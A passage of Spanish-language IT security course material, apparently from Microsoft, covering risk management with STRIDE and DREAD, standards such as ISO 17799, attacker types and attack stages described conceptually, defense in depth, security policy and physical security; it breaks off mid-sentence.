FUNDAMENTOS DE SEGURIDAD

1.1. Requisitos previos para el curso on-line

 Experiencia práctica en la instalación, configuración, administración y

planeamiento de la implementación de Windows 2000 o Windows Server
2003
 Experiencia con Active Directory

1.2. Panorama actual

1.3. El delito informático está aumentando de frecuencia y de severidad:

Los meses recientes han considerado un claro aumento en ataques criminales

contra los sistemas informáticos del mundo. La naturaleza del riesgo está
cambiando rápidamente y está llegando a ser más y más seria. Los hackers
criminales se están sofisticando y la proliferación de conexiones de banda ancha
de alta velocidad — una cosa muy positiva en todos aspectos — crea un
ambiente en el cual un virus o un gusano puede esparcirse increíblemente
rápido y afectar a negocios y a consumidores más rápidamente y
perceptiblemente que antes.

1.4. La tecnología existe para los sistemas de protección pero la clave

está en la puesta en práctica:

Mientras que no hay software inmune a estos ataques criminales, las

computadoras se pueden instalar y mantener de manera de reducir al mínimo el
riesgo. Pero hasta la fecha ha sido demasiado difícil, complicado y desafiante
administrar las herramientas existentes de seguridad, muchas de las cuales,
cuando se implementan apropiadamente, son altamente eficaces en la
prevención o la atenuación del impacto en la computadora atacada.

1.5. Microsoft está tratando el problema de complejidad hoy y en el

futuro:

Reconocemos que Microsoft puede desempeñar un papel dominante en mejorar

la seguridad de la computadora: necesitamos continuar invirtiendo y entregando
un nivel más alto de seguridad, necesitamos simplificar la seguridad y conducir
la inteligencia de las protecciones de seguridad más profundas en nuestro
software para reducir las demandas en los usuarios y los administradores. Los
clientes nos dicen que esperan que nosotros hagamos más y nosotros estamos
escuchando y trabajando de maneras múltiples para innovar y tratar el problema.
Los clientes nos han dicho que quieren que las herramientas, las
características y las configuraciones de seguridad sean más fáciles de
poner en práctica y más simples de utilizar, y que las protecciones de
seguridad sean intrínsecas al software.

Durante este curso, hablaremos de cómo Microsoft está respondiendo a estas

demandas y al contorno de acciones que estamos llevando a cabo, integrando
tecnologías de seguridad.

Las acciones específicas incluirán:

 Los procesos, las políticas y las tecnologías mejoradas de la
administración de parches para ayudar a clientes a permanecer
actualizados y seguros.
 El otorgamiento de una dirección mejor y las herramientas para asegurar
sistemas.
 Actualizaciones a Microsoft Windows® XP y Windows Server 2003 con
las nuevas tecnologías de seguridad ,que harán a Windows más
resistente a los ataques, incluso si los parches todavía no existen ni se
han instalado.

1.6. Definir Seguridad de Plataforma

Hay varias pautas, estándares y recomendaciones disponibles que pueden

ayudar a simplificar la tarea de asegurar su empresa. Miremos algunos de éstos
detalladamente.

IT Infrastructure Library (ITIL) Definition

El gerenciamiento de la seguridad es responsable de la confidencialidad, la

integridad y la disponibilidad de datos asociados a un servicio. Un número de
security issues tienen que ser cubiertos por la administración de disponibilidad:

- Los servicios deben estar disponibles sólo para el personal autorizado

- Los datos deben estar disponibles solamente para el personal autorizado
y solamente en las horas convenidas
- Los servicios deben ser recuperables dentro de los parámetros
convenidos de confidencialidad e integridad
- Los servicios se deben diseñar y funcionar dentro de las políticas de
seguridad
- Los contratistas deben tener acceso al hardware o al software

Nota: Para más información, ir a http://www.itil.org/itil_e/itil_e_080.html

ISO 17799 (British Standard 7799)

De http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter

“La información es la sangre de todas las organizaciones y puede existir en

muchas formas. Puede ser impresa o escrita en papel, almacenada
electrónicamente, transmitida por correo electrónico, mostrada en películas o
hablada en una conversación. En el ambiente de negocio competitivo de hoy, tal
información está constantemente bajo amenaza de muchas fuentes. Éstas
pueden ser internas, externas, accidentales o maliciosas. Con el uso creciente
de la nueva tecnología, al almacenar, transmitir y recuperar la información,
hemos abierto un gran número y tipo creciente de amenazas”.

“Hay una necesidad de establecer una política comprensiva de seguridad de la

información dentro de todas las organizaciones. Usted necesita asegurar la
confidencialidad, integridad y disponibilidad de la información corporativa vital y
de la información del cliente. El estándar para Information Security Management
System (ISMS) BS 7799, ya ha sido rápidamente establecido por los vendedores
de software más grandes del mundo”.

ISO 17799 (British Standard 7799) proporciona un acercamiento sistemático

para administrar la información corporativa sensible. Proporciona los requisitos
para Information Security Management System. Security Management System
es un código de práctica que incluye gente, procesos, y sistemas. ISO 17799
abarca de las diez secciones. Como ISO 17799 es un estándar, se recomienda
que éste sea repasado para el detalle en cada una de las 10 clasificaciones de
seguridad.

Nota: Para más información, ir a:

http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf
http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf
http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter

Microsoft Operations Framework

 Cap1-34.jpg

Microsoft Operations Framework (MOF) proporciona la dirección técnica y la

ayuda de consulta que permite a organizaciones alcanzar confiabilidad,
disponibilidad, soportabilidad y flexibilidad en sistemas de misión critica de los
productos y tecnologías Microsoft.

MOF proporciona la dirección operacional en forma de white papers, guías de

operaciones, herramientas, las mejores prácticas, casos de estudio, plantillas,
herramientas de soporte y servicios. Estas guías están dirigidas a gente,
procesos, tecnología y administración de issues complejos, ambientes IT
heterogéneos y distribuidos.

1.7. Indice del presente capítulo

• Caso práctico
• Disciplina de administración de riesgos de seguridad
• Defensa en profundidad
• Respuesta a incidentes de seguridad
• Ejemplos de ataques
• Recomendaciones
• Diez normas de seguridad inmutables
 1.8. Caso práctico

Aquí se establecerá el fundamento empresarial de la seguridad.

Específicamente, se tratará:

 Las consecuencias de las infracciones de seguridad.

 La encuesta de CSI/FBI de 2003.

1.9. Repercusión de las infracciones de seguridad

Cap1-01.jpg

Las infracciones de seguridad afectan a las organizaciones de diversas formas.

Con frecuencia, tienen los resultados siguientes:

 Pérdida de beneficios
 Perjuicio de la reputación de la organización
 Pérdida o compromiso de la seguridad de los datos
 Interrupción de los procesos empresariales
 Deterioro de la confianza del cliente
 Deterioro de la confianza del inversor
 Consecuencias legales: en muchos estados o países, la incapacidad de
proteger un sistema tiene consecuencias legales; un ejemplo es Sarbanes
Oxley, HIPAA, GLBA, California SB 1386.
- Las infracciones de seguridad tienen efectos de gran repercusión.
Cuando existe una debilidad en la seguridad, ya sea real o sólo una
percepción, la organización debe emprender acciones inmediatas para
garantizar su eliminación y que los daños queden restringidos.
- Muchas organizaciones tienen ahora servicios expuestos a los clientes,
como los sitios Web. Los clientes pueden ser los primeros en observar el
resultado de un ataque. Por lo tanto, es esencial que la parte de una
compañía que se expone al cliente sea lo más segura posible.

1.10. Encuesta de CSI/FBI de 2003

Cap1-02.jpg

 El costo de la implementación de medidas de seguridad no es trivial; sin

embargo, sólo es una fracción del costo que supone mitigar un incidente
de seguridad.
 La encuesta más reciente sobre seguridad y delitos informáticos del
Instituto de seguridad de equipos y de la Oficina Federal de Investigación
(CSI/FBI, Computer Security Institute/Federal Bureau of Investigation) de
Estados Unidos, incluye cifras interesantes relativas a las pérdidas
financieras que suponen los ataques a equipos para las organizaciones
que los sufren.
  La encuesta demuestra que los ataques de denegación de servicio (DoS,
Denial Of Service) y de robo de información son los responsables de las
mayores pérdidas.
 En consecuencia, es importante saber que aunque el costo de la
implementación de sistemas de protección de la seguridad no es trivial,
supone una fracción del costo que conlleva mitigar los compromisos de la
seguridad.
 La solución de seguridad más efectiva es la creación de un entorno en
niveles de modo que se pueda aislar un posible ataque llevado a cabo en
uno de ellos. Un ataque tendría que poner en peligro varios niveles para
lograr su propósito. Esto se conoce como defensa en profundidad. Esta
estructura de seguridad se explicará detalladamente más adelante en
esta presentación.

1.11. Disciplina de administración de riesgos de seguridad

En este capítulo, se explicará la disciplina de administración de riesgos de

seguridad (SRMD). Específicamente, se tratará:

Los tres procesos de SRMD son:

 Evaluación.
 Desarrollo e implementación.
 Funcionamiento.

La evaluación implica:
 Evaluación y valoración de activos.
 Identificación de riesgos de seguridad con STRIDE.
 Análisis y asignación de prioridad a los riesgos de seguridad con DREAD.
 Seguimiento, planeamiento y programación de actividades relacionadas
con los riesgos de seguridad.

El desarrollo e implementación incluyen:

 Desarrollo de métodos correctivos de seguridad.
 Prueba de los métodos correctivos de seguridad.
 Obtención de información de seguridad.

El funcionamiento incluye
 Volver a valorar los activos nuevos y los que han sufrido cambios, así
como los riesgos de seguridad.
 Estabilizar e implementar medidas preventivas nuevas o que han
cambiado.
 1.12. Procesos

Cap1-03.jpg

La disciplina de administración de riesgos de seguridad (SRMD, Security Risk

Management Discipline) define los tres procesos principales que una
organización debe implementar para llegar a ser segura y continuar siéndolo.
Los tres procesos son:

• Evaluación: esta fase implica la recopilación de la información relevante

del entorno de la organización con el fin de realizar una estimación de la
seguridad. Debe recopilar datos suficientes para analizar de forma
efectiva el estado actual del entorno. A continuación, se debe determinar
si los activos de información de la organización están bien protegidos de
posibles amenazas, y se debe crear un plan de acción de seguridad, que
se pone en práctica durante el proceso de implementación.
• Desarrollo e implementación: esta fase se centra en la puesta en
marcha de un plan de acción de seguridad destinado a implementar los
cambios recomendados definidos en la fase de evaluación. Además, se
desarrolla un plan de contingencia de riesgos de seguridad.
• Funcionamiento: durante esta fase, se debe modificar y realizar
actualizaciones en el entorno a medida que se necesiten para mantener
su seguridad. Durante los procesos operativos, se llevan a cabo
estrategias de pruebas de la penetración y de respuesta a incidentes, que
ayudan a solidificar los objetivos de la implementación de un proyecto de
seguridad en la organización. Asimismo, también se realizan actividades
 de auditoría y supervisión para mantener la infraestructura intacta y
segura.

En la guía de Microsoft Solutions para la protección de Windows 2000 Server

(Microsoft Solutions Guide for Securing Windows 2000 Server) en
www.microsoft.com, se encuentran detalles adicionales de SRMD.

1.13. Evaluación: evaluar y valorar

Cap1-04.jpg

 La evaluación de activos determina el valor reconocido de la información

desde el punto de vista de quienes la utilizan y el trabajo que conlleva su
desarrollo. La evaluación de activos también implica determinar el valor
de un servicio de red, por ejemplo, el de un servicio que proporciona a los
usuarios de la red acceso saliente a Internet, desde el punto de vista de
quienes utilizan dicho servicio y lo que costaría volver a crearlo.
 La valoración determina cuánto cuesta mantener un activo, lo que
costaría si se perdiera o destruyera y qué beneficio lograrían terceros si
obtuvieran esta información. El valor de un activo debe reflejar todos los
costos identificables que surgirían si el activo se viera perjudicado.
 Al determinar las prioridades en relación a los activos, se pueden emplear
valores arbitrarios, como los mostrados en la diapositiva, o valores
específicos, como el costo monetario real. Las organizaciones deben
utilizar la escala más apropiada para resaltar el valor relativo de sus
activos.
1.14.

Cap1-05.jpg

 La identificación de los riesgos de seguridad permite a los miembros de

los grupos de trabajo del proyecto aclarar las ideas e identificar posibles
riesgos para la seguridad. La información se recopila en forma de
amenazas, vulnerabilidades, puntos débiles y medidas preventivas. El
modelo STRIDE proporciona una estructura valiosa y fácil de recordar
para identificar las amenazas y los posibles puntos débiles.
 La suplantación de identidades es la capacidad de obtener y usar la
información de autenticación de otro usuario. Un ejemplo de suplantación
de identidad es la utilización del nombre y la contraseña de otro usuario.
 La alteración de datos implica su modificación. Un ejemplo sería alterar el
contenido del cookie de un cliente.
 El repudio es la capacidad de negar que algo ha ocurrido. Un ejemplo de
repudio sería que un usuario cargue datos dañinos en el sistema cuando
en éste no se puede realizar un seguimiento de la operación.
 La divulgación de información implica la exposición de información ante
usuarios que se supone que no deben disponer de ella. Un ejemplo de
 divulgación de información es la capacidad de un intruso para leer
archivos médicos confidenciales a los que no se le ha otorgado acceso.
 Los ataques de denegación de servicio privan a los usuarios del servicio
normal. Un ejemplo de denegación de servicio consistiría en dejar un sitio
Web inaccesible al inundarlo con una cantidad masiva de solicitudes
HTTP.
 La elevación de privilegios es el proceso que siguen los intrusos para
realizar una función que no tienen derecho a efectuar. Para ello, puede
explotarse una debilidad del software o usar las credenciales de forma
ilegítima.

Otros ataques podrían ser llevados a cabo únicamente con el propósito de que
el sistema de destino incurra en gastos. Por ejemplo, se podría montar un
ataque contra un servicio de fax o un teléfono celular para hacer un gran número
de llamadas internacionales que supongan un gran costo.
 1.15. Amenazas comunes

1.15.1. ¿Quién puede atacar?

Cap1-28.jpg

Los atacantes de todas las capacidades y motivaciones son peligrosos a la

seguridad de la red interna, de diversas maneras:

Principiante. La mayoría de los atacantes tienen solamente conocimiento básico

de sistemas pero son inmóviles y peligrosos porque no entienden a menudo
completamente las consecuencias de sus acciones.

Intermedio. Los atacantes con habilidades intermedias generalmente están

intentando ganar respeto en comunidades de atacantes. Típicamente, atacan
blancos prominentes y crean herramientas automatizadas para atacar otras
redes.
Avanzado. Los atacantes altamente expertos presentan un desafío serio a la
seguridad porque sus métodos de ataque se pueden extender más allá de la
tecnología en intrusión física e ingeniería social, o engaño de un usuario o
administrador para ganar la información. Aunque hay relativamente pocos
atacantes avanzados, sus habilidades y la experiencia los hacen los atacantes
más peligrosos a una red.

1.15.2. Vulnerabilidades

Cap1-29.jpg

Los ataques más acertados contra redes tienen éxito explotando el campo
común y las vulnerabilidades o debilidades sabidas. Asegúrese de entrenar a
administradores y reconocer estas vulnerabilidades para que lleguen a ser
familiares con nuevas vulnerabilidades cuando ellas se descubran.

1.15.3. ¿Cómo ocurren los ataques?

Cap1-30.jpg

Los ataques contra redes siguen a menudo el mismo patrón. Métodos de diseño
para detectar, responder o prevenir ataques durante cada una de las siguientes
etapas:

1. Ingreso. En esta etapa, el atacante investiga a la organización blanco. Él

puede obtener toda la información pública sobre una organización y sus
empleados y realizar exploraciones completas en todas las computadoras y
dispositivos que son accesibles desde Internet.
2. Penetración. Después de que el atacante haya localizado vulnerabilidades
potenciales, intenta aprovecharse de una de ellas. Por ejemplo, el atacante
explota un Servidor Web que carece de la actualización última de seguridad.
3. Elevación del privilegio. Luego que el atacante ha penetrado con éxito la red,
procura obtener los derechos a nivel sistema de Administrador. Por ejemplo,
mientras que explota el servidor Web, gana control de un proceso funcionando
bajo el contexto LocalSystem. Este proceso será utilizado para crear una cuenta
administrador. En general, seguridad pobre como resultado de usar las
configuraciones por defecto, permite que un atacante obtenga el acceso de red
sin mucho esfuerzo.
4. Explotar. Después de que el atacante haya obtenido las derechas necesarias,
él realiza la hazaña o método de romper la red. Por ejemplo, el atacante elige
desfigurar el sitio público Web de la organización.
5. Cover-up. La etapa final de un ataque es donde un atacante procura ocultar
sus acciones para escapar a la detección o el procesamiento. Por ejemplo, un
atacante borra entradas relevantes en archivos log de la intervención.

1.16. Evaluación: análisis y establecimiento de prioridades de los

riesgos de seguridad: DREAD

 DREAD
• Daño
• Capacidad de reproducción
• Capacidad de explotación
• Usuarios afectados
• Capacidad de descubrimiento

 Exposición al riesgo = Prioridad del activo x Categoría de la amenaza

• El análisis de riesgos de seguridad se utiliza para analizar los ataques,

herramientas, métodos y técnicas que podrían usarse para explotar una
posible vulnerabilidad. El análisis de riesgos de seguridad es un método
para la identificación de riesgos y la evaluación del posible daño que
podría ocasionarse. El resultado de la evaluación puede usarse para
justificar medidas de protección de la seguridad.
• Un análisis de riesgos de seguridad tiene tres objetivos principales:
identificar riesgos, cuantificar los efectos de las posibles amenazas y
proporcionar un equilibrio económico entre la repercusión del riesgo y el
costo de la medida preventiva. La información se recopila para estimar el
grado de riesgo de modo que el grupo de trabajo pueda tomar decisiones
fundadas en relación a qué riesgos de seguridad deben constituir el
objeto principal de las estrategias correctivas.
 Este análisis se usa entonces para asignar prioridad a los riesgos de
seguridad y permitir a la organización destinar los recursos para tratar los
problemas de seguridad más importantes.
• Una vez identificada una amenaza, debe clasificarse. Una solución para
ello es usar DREAD. La clasificación de 1 a 10 se asigna en cinco áreas:
daños, capacidad de reproducción, capacidad de explotación, usuarios
afectados y capacidad de descubrimiento.
• La clasificación se realiza como promedio, con lo que ofrece una
categoría global de amenazas. Cuanto mayor es la categoría, más grave
es la amenaza. Esta clasificación proporciona una perspectiva de la
prioridad relativa de cada riesgo en vez de una cuantificación real del
mismo. Para ello se pede tomar esta categoría y multiplicarla por el grado
de imprescindibilidad de un sistema para conocer el riesgo que supone
para éste.

1.17. Elementos a proteger

Cap1-31.jpg

Además de la protección física enumerada en la tabla, gran parte del papel de la

seguridad es proteger la confianza pública y la confianza en socios de negocio.
En las prácticas generalmente aceptadas de la contabilidad (GAAP), este tipo de
activo se conoce como voluntad, que se puede poner en estados financieros
cuando venden a una compañía.

Considerar, por ejemplo, que un atacante atacó el sitio Web de su organización.

Usted notifica a sus clientes que el atacante ha robado la información privada de
Usuarios del sitio Web, incluyendo sus direcciones y números de tarjeta de
crédito. Además de incurrir en pérdidas financieras directas del negocio, su
organización también sufre una pérdida de confianza porque se desdibuja la
imagen de la compañía.

1.18.

Cap1-06.jpg

 Las tareas de seguimiento, planeamiento y programación de riesgos de

seguridad toman la información obtenida en el análisis de riesgos de
seguridad y se utilizan para formular estrategias correctivas y de
contingencia, además de los planes para abarcarlas.
 La programación de riesgos de seguridad intenta definir un programa para
las diversas estrategias correctivas, creadas durante la fase de generación
de un proyecto de seguridad. Esta programación tiene en consideración la
forma en que los planes de seguridad se aprueban e incorporan a la
arquitectura de información, además de los procedimientos de operaciones
diarias estándares que deben implementarse.

1.19.
 Cap1-07.jpg

El desarrollo de métodos correctivos para los riesgos de seguridad es un

proceso en el que se toman los planes creados durante la fase de evaluación y
se usan para elaborar una nueva estrategia de seguridad que implique la
administración de la configuración y las revisiones, la supervisión y auditoría de
los sistemas, y la creación de directivas y procedimientos operativos.

A medida que se desarrollan las diversas medidas preventivas, es importante

garantizar que se realice un seguimiento e informe minuciosos del progreso.

La prueba de las estrategias correctivas de los riesgos de seguridad tienen lugar

después de su desarrollo, una vez realizados los cambios de administración del
sistema asociados y escrito las directivas y procedimientos para determinar su
efectividad.

El proceso de prueba permite al grupo de trabajo considerar cómo se pueden

implementar dichos cambios en un entorno de producción. Durante el proceso
de prueba, las medidas preventivas se evalúan teniendo en cuenta la efectividad
con respecto a cómo se consigue controlar el riesgo de seguridad y a los efectos
indeseables que se observan en otras aplicaciones.

1.20. Obtención
 Cap1-08.jpg

El conocimiento de los riesgos de seguridad permite formalizar el proceso para

recopilar la información sobre cómo el grupo de trabajo protegió los activos y
documenta las vulnerabilidades y puntos débiles que se descubrieron. Cuando el
departamento de tecnología de la información (IT, Information Technology)
reúne nueva información relativa a la seguridad, dicha información se debe
capturar y volver a implementar para garantizar la máxima eficacia, continuada
de las medidas preventivas de seguridad que protegen los activos de la
organización. Además, se debe implantar un programa de aprendizaje destinado
a los grupos empresariales. Este programa de aprendizaje puede tomar la forma
de cursos instructivos o de boletines diseñados para adquirir conciencia de la
seguridad.

Una organización debe definir un proceso formal de administración de riesgos

que determinará cómo se inician y evalúan las medidas preventivas, y en qué
circunstancias se debe avanzar de un paso a otro en cada riesgo de seguridad o
conjunto de riesgos.

1.21. Funcionamiento: reevaluación de los activos y los riesgos

 Cap1-09.jpg

 Las organizaciones son dinámicas y su plan de seguridad también debe

serlo. Se debe actualizar la evaluación de riesgos periódicamente. Asimismo,
valorar el plan de evaluación de riesgos cada vez que se realice un cambio
importante en el funcionamiento o en la estructura. Es decir, si se efectúa
una reorganización o se traslada a un edificio nuevo o se cambia de
proveedores o se activa un nuevo sitio Web o se realizan otros cambios
importantes, se deben volver a evaluar los riegos y las posibles pérdidas
mediante los pasos descritos anteriormente en la fase de evaluación.
 Es importante evaluar los riesgos de forma continuada. Esto significa que
nunca se debe dejar de buscar nuevos riesgos ni de reevaluar
periódicamente los riesgos existentes. Si no se realiza alguna de estas
acciones, la administración de riesgos no beneficiará a la organización. La
frecuencia con que se debe revisar el plan de administración de riesgos y sus
activadores debe definirse en la directiva de seguridad de la organización.
 La reevaluación de activos y riesgos es esencialmente un proceso de
administración de cambios, pero también se utiliza para realizar la
administración de la configuración de seguridad. Esto permite reducir el
trabajo administrativo cuando se han completado las medidas preventivas y
las directivas de seguridad.
 1.22. Funcionamiento: estabilización y desarrollo de medidas
preventivas

Cap1-10.jpg

En general, la Disciplina de Administración de Riesgos de Seguridad se basa en

los siguientes componentes de la guía de ciclo de vida de tecnología de la
información de Microsoft:

 Disciplina de administración de riesgos de Microsoft Solutions Framework

(MSF)
http://www.microsoft.com/technet/itsolutions/techguide/msf/msrmd11.mspx
(este sitio está en inglés)
 Modelo de riesgo para operaciones de Microsoft Operations Framework
(MOF)
http://www.microsoft.com/technet/itsolutions/techguide/mof/mofrisk.mspx
(este sitio está en inglés)

La diapositiva muestra el modelo de riesgo para operaciones de MOF, que

describe los pasos del proceso de administración de riesgos: identificar, analizar,
planear, rastrear y controlar. Se trata de un proceso continuado que implica la
evaluación y el análisis continuados de los riesgos de seguridad. En
consecuencia, será necesario implementar continuamente nuevas medidas
preventivas o realizar cambios en las existentes, basándose en esta nueva
evaluación.

Después de la implementación de las medidas preventivas nuevas o que han

cambiado, es importante mantener el proceso de las operaciones. Las tareas
que los administradores de seguridad o los administradores de redes tienen que
realizar pueden incluir:

 Administración del sistema

 Mantenimiento de cuentas
 Supervisión de servicios
 Programación de trabajos
 Procedimientos de copia de seguridad

Estos procesos de implementación de la estabilización y las medidas

preventivas corresponden a las fases de estabilización y desarrollo del modelo
de proceso MSF, que pueden encontrarse en
http://www.microsoft.com/technet/itsolutions/techguide/msf/msfpm31.mspx
(este sitio está en inglés).

1.23. Defensa en profundidad

En este tema, se expondrá la defensa en profundidad. Específicamente, se

tratará:

 Organización de una estructura para la seguridad: defensa en profundidad.

 Cómo se puede ver comprometida la seguridad de cada nivel del modelo de
defensa en profundidad.
 Cómo proporcionar protección para cada nivel del modelo de defensa en
profundidad.

Para reducir riesgo en un ambiente, se debe utilizar una estrategia de la

defensa-en-profundidad para proteger recursos contra amenazas externas e
internas. Defensa en profundidad (llamado a veces seguridad en profundidad o
seguridad de varias capas) se toma de un término militar usado para describir
las contramedidas de la seguridad para formar un ambiente cohesivo de
seguridad sin un solo punto de falla. Las capas de la seguridad que forman la
estrategia de defensa-en-profundidad deben incluir medidas protectoras que
implementen desde sus routers externos completamente a la localización de los
recursos y a todos los puntos entre ellos.

Por capas múltiples se implementa seguridad, y se debe ayudar a asegurar una

capa si se compromete la misma, Las otras capas proporcionarán la seguridad
necesaria para proteger los recursos. Por ejemplo, el compromiso del firewall de
una organización no debe proporcionar acceso del atacante a los datos más
sensibles de la organización. Cada capa debe proporcionar idealmente diversas
formas de contramedidas para evitar que el mismo método de ataque sea
utilizado en las diferentes capas.

Se debe invertir en una protección multi-vendor contra virus si es posible.

También es necesario asegurarse de que la protección de virus esté configurada
en diversos puntos como gateway, server, clientes etcétera.

1.24. Estructura de organización de la seguridad

 Cap1-11.jpg

 Para reducir al mínimo la posibilidad de que un ataque contra una

organización tenga éxito, se debe utilizar el mayor número posible de niveles
de defensa.
 Defender una organización en profundidad implica el uso de varios niveles de
defensa. Si un nivel se ve comprometido, ello no conlleva necesariamente
que también lo esté toda la organización. Como directriz general, se debe
diseñar y crear cada nivel de la seguridad bajo el supuesto de que se ha
conseguido infringir la seguridad. Realizar los pasos necesarios para
proteger el nivel en el que se esté trabajando.
 Además, hay muchas formas de proteger cada nivel individual mediante
herramientas, tecnologías, directivas y la aplicación de las recomendaciones.
Por ejemplo:
• Nivel de directivas, procedimientos y concienciación: programas
educativos de seguridad para los usuarios
• Nivel de seguridad física: guardias de seguridad, bloqueos y
dispositivos de seguimiento
• Nivel perimetral: servidores de seguridad de hardware, software o
ambos, y creación de redes privadas virtuales con procedimientos
de cuarentena
• Nivel de red de Internet: segmentación de red, Seguridad IP
(IPSec) y sistemas de detección de intrusos de red
• Nivel de host: prácticas destinadas a reforzar los servidores y
clientes, herramientas de administración de revisiones, métodos
seguros de autenticación y sistemas de detección de intrusos
basados en hosts.
• Nivel de aplicación: prácticas destinadas a reforzar las aplicaciones
y el software antivirus
• Nivel de datos: listas de control de acceso (ACL) y cifrado

1.25. Descripción de las directivas, los procedimientos y el nivel de

concienciación
 Cap1-12.jpg

 Generalmente, los usuarios no tienen en cuenta la seguridad cuando realizan

sus tareas diarias.
 Una directiva de seguridad para una organización debe definir:
• El uso aceptable.
• El acceso remoto.
• La protección de la información.
• La copia de seguridad de los datos.
• La seguridad del perímetro.
• La seguridad de los dispositivos y hosts básicos.
 Una directiva debe comunicar consenso y proporcionar el fundamento
para que el departamento de Recursos Humanos actúe en el caso de que
se infrinja la seguridad. También puede ayudar a demandar a quienes
logren infringir la seguridad.
 Una directiva de seguridad debe proporcionar a la organización un
procedimiento de tratamiento de incidentes apropiado. Debe definir:
• Las áreas de responsabilidad.
• El tipo de información que debe registrarse.
• El destino de esa información.
 • Qué acciones emprender tras un incidente.
 Una directiva de seguridad adecuada suele ser el fundamento del resto
de prácticas de seguridad. Cada directiva debe ser lo suficientemente
general para poder aplicarse en distintas tecnologías y plataformas. Al
mismo tiempo, debe ser lo suficientemente específica para proporcionar a
los profesionales de IT orientación sobre cómo implementar la directiva.
 El ámbito de la directiva de seguridad de una organización depende del
tamaño y complejidad de ésta. En muchas organizaciones hay consejos
disponibles sobre cómo crear directivas de seguridad, por ejemplo, en
http://www.sans.org/ y http://www.iss.net/ (estos sitios están en inglés).

1.26. Directivas, procedimientos y compromiso del nivel de

concienciación

Los intrusos pueden usar estratagemas sociales para aprovecharse de los

usuarios que no son conscientes de los problemas de seguridad que pueden
surgir en su lugar de trabajo o que los desconocen. Para los usuarios, muchas
medidas de seguridad parecen innecesarias y, por lo tanto, no las siguen.

Muchos ataques implican el uso de estratagemas sociales. Ciertos artificios

sociales se aprovechan de la despreocupación por la seguridad con que la
mayor parte de los usuarios actúan en su vida diaria. Un intruso puede emplear
su tiempo de ocio o de trabajo en intentar conocer a los usuarios y ganarse su
confianza. Aunque un intruso formule preguntas aparentemente inofensivas, la
información que obtiene en conjunto le proporciona los medios para llevar a
cabo o iniciar un ataque.

1.27. Directivas, procedimientos y protección del nivel de

concienciación

 Para contrarrestar estas amenazas de estratagemas sociales, las

organizaciones deben implementar procedimientos claros y precisos, y
procesos que deban cumplir todos los empleados, además de entrenarlos
en el uso de estas directivas. Cada función que se desempeñe debe tener
instrucciones claras y documentadas.
 Siempre se requieren programas de aprendizaje sobre seguridad para
detallar estos procesos y procedimientos. Las instrucciones deben formar
una imagen completa de la seguridad de modo que los usuarios
entiendan la necesidad de disponer de seguridad en todos los niveles y
en todas las ocasiones.
 Una directiva de seguridad combina las necesidades de seguridad y la
cultura de una organización. Se ve afectada por el tamaño de la
 organización y sus objetivos. Algunas directivas pueden ser aplicables a
todos los sitios pero otras son específicas de ciertos entornos. Una
directiva de seguridad debe equilibrar la posibilidad de control con la
necesidad de productividad. Si las directivas son demasiado restrictivas,
los usuarios siempre encontrarán formas de omitir los controles. Una
organización debe demostrar un compromiso en la administración con
respecto al grado de control definido en una directiva; de lo contrario, no
se implementará correctamente.

1.28. Descripción del nivel de seguridad física

Cap1-13.jpg

 Un intruso con acceso a los componentes físicos puede omitir fácilmente

muchos procedimientos de seguridad.
 Un intruso puede utilizar el teléfono de una compañía o un dispositivo de
mano. Acciones como ver las listas de contactos o números de teléfono,
enviar un mensaje de correo electrónico o responder al teléfono
identificándose como su propietario, pueden facilitar al intruso la
consecución de su objetivo.
 Los equipos portátiles de una compañía pueden contener abundante
información muy útil para un intruso. Es por ello que siempre deben
almacenarse de un modo seguro cuando no se estén usando.
1.29. Compromiso del nivel de seguridad física

Cap1-14.jpg

 Si los intrusos obtienen acceso físico a los sistemas, pasan a convertirse

en efecto en sus propietarios.
 En algunos casos, un ataque sólo es un acto vandálico. Deshabilitar un
sistema puede constituir un problema importante, pero no es menos serio
que el hecho de que un intruso pueda ver, cambiar o eliminar datos que
se piensa que son seguros.
 El acceso físico a un sistema también permite a un intruso instalar
software. El software puede pasar desapercibido y ejecutarse en un
sistema durante un período considerable, durante el que consigue
recopilar datos esenciales de la compañía. Esto puede resultar
desastroso.
1.30. Protección en el nivel de seguridad física

 Se puede utilizar una amplia variedad de técnicas para proteger una

instalación. El grado de seguridad física disponible depende del
presupuesto. Es fácil mantener estándares elevados cuando se trabaja
con un modelo hipotético. Sin embargo, en el mundo real, las soluciones
deben idearse en función del sitio, los edificios y las medidas de
seguridad empleadas. La lista de la diapositiva presenta algunas de las
maneras en que puede proteger una instalación.
 La defensa en profundidad comienza por aplicar una seguridad física a
todos los componentes de la infraestructura. Si algún individuo no
autorizado tiene acceso físico al entorno, éste no se puede considerar
seguro. Por ejemplo, un técnico de mantenimiento podría cambiar un
disco con errores en una matriz RAID1 que contenga datos de clientes.
Es posible que el disco se pueda reparar. Los datos están ahora en
manos de un tercero.
 El primer paso es separar los servidores de los operadores humanos y los
usuarios. Todas las salas de servidores deben estar cerradas con llave. El
acceso a las salas de servidores debe estar controlado y registrado
estrictamente. Algunos de los mecanismos de control de acceso que
pueden aplicarse incluyen el uso de placas de identificación y sistemas
biométricos. Un empleado de confianza debe organizar de antemano el
acceso y autorizarlo. Si no existen salas especiales para los servidores,
éstos se deben proteger en cabinas o, al menos, cerrarse bajo llave en
los armarios. La mayor parte de los armarios de servidores se puede abrir
con una llave estándar de modo que no debe confiar únicamente en las
cerraduras que vengan de fábrica.
 Todas las salas de servidores deben disponer de algún tipo de
mecanismo contra incendios: los incendios provocados constituyen una
amenaza que requiere una medida preventiva.
 El acceso debe ser supervisado por guardias de seguridad o mediante un
circuito cerrado de televisión (CCTV). Las grabaciones de vídeo de CCTV
se pueden usar con fines de auditoría y la presencia de cámaras puede
servir para prevenir accesos oportunistas. Tenga en cuenta que en la
mayor parte de las ocasiones, quienes consiguen infringir la seguridad
son individuos que curiosean sin malas intenciones, no piratas
informáticos especializados que persiguen un fin dañino.
 El acceso físico se extiende a las consolas de administración remotas,
además de a los servidores. No tiene sentido proteger directamente el
acceso a los monitores y los teclados si los servicios de terminal pueden
tener acceso a los servidores desde cualquier lugar de la red interna. Esta
directriz se aplica a las soluciones de monitor de vídeo de teclado (KVM,
 Keyboard Video Monitor) IP y también al hardware de administración
remota.
 Igualmente, es importante limitar las oportunidades que puedan facilitar
que los usuarios, con buenas intenciones o no, infecten o pongan en
peligro un sistema. Quitar los dispositivos de entrada de datos como las
